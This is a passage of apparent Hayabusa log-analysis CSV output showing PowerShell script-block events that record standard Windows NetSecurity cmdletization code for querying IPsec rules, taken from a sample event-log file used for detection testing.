[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, 
$false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery',",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ne=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and 
(@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 